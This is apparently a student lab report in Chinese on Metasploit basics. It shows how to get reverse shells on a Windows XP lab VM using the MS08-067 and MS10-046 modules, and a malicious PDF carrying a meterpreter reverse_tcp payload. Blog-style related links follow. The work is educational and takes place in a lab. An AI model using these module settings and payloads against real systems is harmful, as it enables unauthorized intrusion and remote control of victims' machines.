20145239杜文超《网络攻防》- MSF基础应用

基础问题回答

1、用自己的话解释什么是exploit,payload,encode?

  • exploit:实现攻击行为的主体,但没有载荷只是一个空壳。没有子弹的枪是很好的比喻。
  • payload:载荷。一般指shellcode,攻击成功后需要运行的东西。
  • encode:编码器。使得我们的攻击中不会出现“坏字符”,也可以通过编码改变特征码,实现免杀。

实验总结与体会

msf仅仅是一个攻击平台,攻击具体的实现还是要靠抓住靶机上的漏洞进行。本次实验我对metasploit的体系结构有了初步的认识。尤其是对6个主要模块的功能和用途有了深入理解和实践经验。我也深刻的认识到在现实中想要真正攻陷一台靶机还是有难度的,因为本次实验我使用的靶机是win xp sp3英文版系统。很老,应该算是被淘汰的了,所以才会有那么多漏洞让我可以抓住去攻击,现在windows版本不断更新,漏洞补丁的更新速度也越来越快,因此更体现出了0 day漏洞的价值。

实验过程

实验环境配置

攻击机:Kali(IP:192.168.248.128)

靶机:Windows XP SP3(IP:192.168.248.129)

MS08_067漏洞渗透攻击

1、先用search ms08_067指令查询该攻击模块。

2、输入use exploit/windows/smb/ms08_067_netapi使用该模块,并用show payloads指令查看一下要用的payload。

3、输入set payload generic/shell_reverse_tcp设置一下payload,通过反向连接获取shell。

4、使用show options指令查看需要进行的配置。

5、如图所示进行配置,设置RHOST为远程靶机IP地址、LHOST为主机IP地址。

6、设置完成后再次确认刚才的设置。

7、输入exploit发起攻击。

8、攻击成功,成功获取靶机系统shell。

对浏览器攻击:ms10_046漏洞攻击

1、先利用search ms10_046指令查看可以运用的攻击模块.

2、使用该漏洞进行攻击。

3、设置相关参数。SRVHOST是本地监听主机的IP地址,LHOST是监听的IP地址,都填攻击者本机IP地址。

4、发起攻击,可以看到,生成了url链接地址。

5、我们使用靶机的IE浏览器登陆一下刚才生成的url地址。

6、发现主机这边已经攻击成功了。

7、使用命令sessions -i 1开始连接,成功得到shell。

对Adobe的漏洞攻击:adobe_pdf_embedded_exe

1、进入文件攻击目录选择一个合适的adobe漏洞。

2、我选择的是adobe_pdf_embedded_exe,use这个漏洞。

3、设置一下payload攻击有效载荷:set payload windows/meterpreter/reverse_tcp

4、show options查看需要进行哪些配置。

5、设置文件名称5239.pdf,LHOST为攻击者主机IP。

6、再次使用show options检查配置。

7、发起攻击。发现生成了一个名为5239的pdf文件。

8、把攻击主机设置为监听状态,方法和以前的实验类似。

9、将该pdf拷贝到靶机上然后打开。

10、攻击机已经成功获取到靶机shell。

辅助模块的应用:scanner/http/dir_listing

1、先用search了解一下有关scanner/http/dir_listing的相关信息。

2、设置相关参数。

3、run,运行成功。

20145239杜文超《网络攻防》- MSF基础应用的更多相关文章

  1. 20145239杜文超《网络对抗》- Web安全基础实践

    20145239杜文超<网络对抗>- Web安全基础实践 基础问题回答 (1)SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查 ...

  2. 20145239杜文超《网络对抗》- Web基础

    20145239杜文超<网络对抗>- Web基础 基础问题回答 1.什么是表单? 表单是一个包含表单元素的区域. 表单元素是允许用户在表单中(比如:文本域.下拉列表.单选框.复选框等等)输 ...

  3. 20145239杜文超《网络对抗》- shellcode注入&Return-to-libc攻击深入

    20145239杜文超<网络对抗>- shellcode注入&Return-to-libc攻击深入 shellcode基础知识 Shellcode是一段代码,作为数据发送给受攻击服 ...

  4. 20145239 杜文超 实验四 Android开发基础

    20145239实验四 Android开发基础 实验内容 基于Android Studio开发简单的Android应用并部署测试 了解Android组件.布局管理器的使用 掌握Android中事件处理 ...

  5. 20145239杜文超 实验五 Java网络编程

    20145239 实验五 Java网络编程 实验内容 组队,一人服务器,一人客户端. 下载加解密代码,先编译运行代码,一人加密一人解密,适当修改代码. 然后集成代码,一人加密后通过TCP发送,加密使用 ...

  6. 20145239杜文超 《Java程序设计》第10周学习总结

    20145239 <Java程序设计>第10周学习总结 教材学习内容总结 Java的网络编程 网络编程 网络编程就是在两个或两个以上的设备(例如计算机)之间传输数据. 网络概述 1.计算机 ...

  7. 20145239杜文超 《Java程序设计》第8周学习总结

    20145239 <Java程序设计>第8周学习总结 教材学习内容总结 通用API 日志API 1.java.util.logging包提供了日志功能相关类与接口,使用日志的起点是logg ...

  8. 20145239杜文超 《Java程序设计》实验二 Java面向对象程序设计实验报告

    20145239 <Java程序设计>实验二 Java面向对象程序设计实验报告 实验内容 初步掌握单元测试和TDD 理解并掌握面向对象三要素:封装.继承.多态 初步掌握UML建模 熟悉S. ...

  9. 20145239杜文超 《Java程序设计》第4周学习总结

    20145239 <Java程序设计>第4周学习总结 教材学习内容总结 第六章: 继承:避免多个类间重复定义共同行为.即当多个类中存在相同属性和行为时,将这些内容抽取到单独一个类中,那么多 ...

随机推荐

  1. Spring MVC控制器类名称处理映射

    以下示例显示如何使用Spring Web MVC框架使用控制器类名称处理程序映射. ControllerClassNameHandlerMapping类是基于约定的处理程序映射类,它将URL请求映射到 ...

  2. What is /dev/null 2>&1?

    >> /dev/null redirects standard output (stdout) to /dev/null, which discards it. (The >> ...

  3. centos7 virtualbox使用internal network 内网模式

    1)打开对应虚拟机的Settings,点开Network, 2)Adapter1如果已经选了挂到Bridged Adapter,则点开Adapter2, 3)选择挂到 Internal Network ...

  4. selenium+testng+reportng+ant+jenkins集成日记

    1.新建一个项目 2.编写测试脚本 3.配置ant的build.xml脚本 4.集成到jenkins,并运行 1.新建项目   注意jdk的版本要一致 eclipse  Window --Prefer ...

  5. 微信 oauth授权2

    2.前面请求成功后 会在跳转url后得到 ?code=00b788e3b42043c8459a57a8d8ab5d9f&state=1 3.之后 使用code换取access_token 换取 ...

  6. 百度网盘不能绑定QQ

    一定要等!!!进度条!! 等全部加载完再点就可以了. 不然的话点关联账号的话会直接跳回个人信息页面. over. 百度账号(百度网盘)绑定QQ账号的页面为什么打不开 总会跳转到个人信息界面,和没点一样 ...

  7. Win API:之GetCurrentThread、GetCurrentThreadId、GetCurrentProcess、GetCurrentProcessId

    Win API:之GetCurrentThread.GetCurrentThreadId.GetCurrentProcess.GetCurrentProcessId {返回当前线程的虚拟句柄} Get ...

  8. artDialog自定义弹框

    弹框内容:<div class='boxy' style="display:none;" id="boxy"> //将div设置成隐藏效果 < ...

  9. Android无线测试之—UiAutomator UiSelector API介绍之六

    对象搜索—类名与包名 一.类名属性定位对象 返回值 API 描述 UiSelector calssName(String className) 完整类名匹配 UiSelector calssNameM ...

  10. jmeter通过json extrcator或者正则表达式获取json返回信息

    1.下载地址,及插件文档资料 https://jmeter-plugins.org/wiki/JSONPathExtractor/ json信息如下 { "error_code": ...